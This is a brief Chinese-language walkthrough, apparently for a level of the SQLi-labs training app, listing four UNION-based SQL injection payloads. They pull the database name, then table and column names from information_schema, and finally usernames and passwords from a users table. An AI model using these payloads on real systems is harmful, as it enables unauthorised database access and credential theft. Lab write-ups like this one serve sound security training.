1.和Less(29)一样,参数变成 id=("1"),但是不知道为什么php5.3.29,5.4.45可以,其他两个无法显示
就会出现这个情况
2.爆破:
(1)爆库:?id=-1") union select 1,database(),3 --+
(2)爆表:?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+
(3)爆列名:?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name="users" --+
(4)爆值:?id=-1") union select 1,group_concat(username,0x7e,password),3 from security.users --+
